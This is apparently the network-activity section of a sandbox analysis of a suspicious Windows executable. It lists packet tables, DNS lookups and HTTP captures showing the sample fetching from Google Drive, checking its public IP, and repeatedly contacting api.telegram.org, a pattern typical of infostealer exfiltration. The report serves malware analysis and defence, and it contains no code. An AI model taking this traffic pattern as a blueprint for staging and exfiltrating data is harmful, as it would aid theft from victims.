                                                                                                                Jan 10, 2025 22:44:39.275329113 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:39.275407076 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:39.275787115 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:39.275800943 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:39.308933020 CET5006480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:39.885128021 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:39.886928082 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:39.886962891 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:39.887032986 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:39.887037992 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.277384996 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.277471066 CET44350065149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.277594090 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:40.277954102 CET50065443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:40.280745983 CET5006480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:40.281877041 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:40.285660028 CET8050064158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.285739899 CET5006480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:40.286719084 CET8050067158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.286787987 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:40.286942959 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:40.291692972 CET8050067158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.892987967 CET8050067158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.896769047 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:40.896823883 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.896919966 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:40.897178888 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:40.897202015 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:40.949526072 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.502751112 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.504609108 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:41.504631042 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.504708052 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:41.504718065 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.777097940 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.777194977 CET44350068149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.777245045 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:41.777813911 CET50068443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:41.797132015 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.799834013 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.802217007 CET8050067158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.802284956 CET5006780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.804656982 CET8050069158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:41.804748058 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.806492090 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:41.811300993 CET8050069158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:42.411880016 CET8050069158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:42.413012981 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:42.413057089 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:42.413121939 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:42.413383961 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:42.413399935 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:42.465181112 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.035051107 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.037231922 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:43.037254095 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.037312984 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:43.037323952 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.444612980 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.444820881 CET44350070149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.444971085 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:43.445239067 CET50070443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:43.497297049 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.497981071 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.502405882 CET8050069158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.502844095 CET8050071158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:43.502955914 CET5006980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.502990961 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.504038095 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:43.508860111 CET8050071158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.100224018 CET8050071158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.101434946 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:44.101489067 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.101547956 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:44.101800919 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:44.101816893 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.152816057 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:44.743817091 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.746058941 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:44.746100903 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:44.746211052 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:44.746217966 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.313694000 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.313785076 CET44350072149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.313883066 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:45.314416885 CET50072443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:45.317955017 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:45.319329023 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:45.322963953 CET8050071158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.323074102 CET5007180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:45.324232101 CET8050073158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.324331999 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:45.324461937 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:45.329292059 CET8050073158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.892574072 CET8050073158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.894061089 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:45.894114017 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.894195080 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:45.894510031 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:45.894532919 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:45.933907986 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.510425091 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.512485981 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:46.512509108 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.512572050 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:46.512583971 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.861061096 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.861140966 CET44350074149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.861272097 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:46.861727953 CET50074443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:46.864434004 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.865411997 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.869502068 CET8050073158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.869613886 CET5007380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.870179892 CET8050075158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:46.870249987 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.870397091 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:46.875189066 CET8050075158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:47.434124947 CET8050075158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:47.435343027 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:47.435390949 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:47.435730934 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:47.435730934 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:47.435776949 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:47.480914116 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.045017958 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.047787905 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.047808886 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.047852039 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.047868967 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.356216908 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.356312990 CET44350076149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.356391907 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.356784105 CET50076443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.359922886 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.360991001 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.365320921 CET8050075158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.365412951 CET5007580192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.365883112 CET8050077158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.365947962 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.366087914 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:48.370910883 CET8050077158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.977690935 CET8050077158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.978902102 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.978960991 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:48.979077101 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.979477882 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:48.979495049 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:49.027653933 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:49.591344118 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:49.592994928 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:49.593020916 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:49.593256950 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:49.593262911 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.021200895 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.021294117 CET44350078149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.021332979 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:50.022082090 CET50078443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:50.049223900 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:50.050496101 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:50.054122925 CET8050077158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.054174900 CET5007780192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:50.055263042 CET8050079158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.055329084 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:50.055474043 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:50.060168982 CET8050079158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.655878067 CET8050079158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.684740067 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:50.684792995 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.684854984 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:50.697173119 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:50.697200060 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:50.699505091 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.323951960 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.329185009 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:51.329224110 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.329296112 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:51.329304934 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.657267094 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.657459021 CET44350080149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.657525063 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:51.657802105 CET50080443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:51.660707951 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.661818027 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.665815115 CET8050079158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.665904045 CET5007980192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.666589022 CET8050081158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:51.666660070 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.666868925 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:51.671633005 CET8050081158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.233449936 CET8050081158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.248425007 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:52.248529911 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.248655081 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:52.248914003 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:52.248953104 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.277698994 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:52.857386112 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.858982086 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:52.859018087 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.859081030 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:52.859086990 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:53.187787056 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:53.187870026 CET44350082149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:53.187920094 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:56.208432913 CET50082443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:56.211836100 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:56.212853909 CET5008380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:56.216895103 CET8050081158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.216949940 CET5008180192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:56.217617989 CET8050083158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.217683077 CET5008380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:56.217771053 CET5008380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:56.222507000 CET8050083158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.801354885 CET8050083158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.802424908 CET50084443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:56.802478075 CET44350084149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.802561998 CET50084443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:56.802835941 CET50084443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:56.802851915 CET44350084149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:56.855796099 CET5008380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:57.414783001 CET44350084149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:57.465126991 CET50084443192.168.2.6149.154.167.220
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 22:43:22.909971952 CET5529353192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:22.917140961 CET53552931.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:24.058732033 CET6410653192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:24.068572998 CET53641061.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:29.149415016 CET6187053192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET53618701.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.679167032 CET5136553192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET53513651.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.240051985 CET5679753192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:37.246711969 CET53567971.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.171865940 CET5604053192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET53560401.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 22:44:52.236747980 CET5006453192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 22:44:52.244582891 CET53500641.1.1.1192.168.2.6
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 22:43:22.909971952 CET192.168.2.61.1.1.10x46b2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:24.058732033 CET192.168.2.61.1.1.10xcbb3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.149415016 CET192.168.2.61.1.1.10xb23eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.679167032 CET192.168.2.61.1.1.10xc940Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:37.240051985 CET192.168.2.61.1.1.10x94feStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.171865940 CET192.168.2.61.1.1.10xfe00Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:44:52.236747980 CET192.168.2.61.1.1.10x1d32Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 22:43:22.917140961 CET1.1.1.1192.168.2.60x46b2No error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:24.068572998 CET1.1.1.1192.168.2.60xcbb3No error (0)drive.usercontent.google.com172.217.18.97A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:29.156164885 CET1.1.1.1192.168.2.60xb23eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:30.686870098 CET1.1.1.1192.168.2.60xc940No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:37.246711969 CET1.1.1.1192.168.2.60x94feNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:43:44.179549932 CET1.1.1.1192.168.2.60xfe00No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 22:44:52.244582891 CET1.1.1.1192.168.2.60x1d32No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                • drive.google.com
                                                                                                                • drive.usercontent.google.com
                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.649910132.226.8.169806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:29.165944099 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:30.056500912 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:29 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 22:43:30.063294888 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 22:43:30.356193066 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:30 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
